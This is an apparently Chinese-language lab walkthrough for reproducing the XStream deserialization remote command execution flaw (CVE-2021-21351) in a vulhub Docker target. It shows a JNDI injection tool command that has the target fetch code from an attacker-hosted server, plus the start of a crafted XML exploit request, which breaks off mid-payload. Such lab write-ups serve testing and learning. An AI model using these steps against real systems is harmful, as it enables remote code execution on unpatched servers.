XStream 反序列化远程命令执行漏洞复现
1. 漏洞影响版本
XStream <= 1.4.15
2. 环境搭建
安装漏洞靶场vulhub
git clone git://github.com/vulhub/vulhub.git
3. 漏洞复现
1 进入到漏洞环境文件夹,启动漏洞环境。
cd /vulhub/xstream/CVE-2021-21351
docker-compose up -d
2 启动好之后,访问靶机的ip加8080端口
3 下载JNDI注入利用工具:
下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases
4 打开burp,设置好代理,抓包
- 设置代理
- 设置好代理之后,访问网站进行抓包(可以右键发送到Repeater)
5 启动下载的JNDI注入利用工具(复制出图中红框中的信息)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/123.txt" -A 10.44.28.91
注意: -A的地址填写攻击机的IP,也就是你的PC主机。
6 修改请求的数据包:将第5步复制出来的信息粘贴到< dataSource>这一行中。
POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3182
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap&l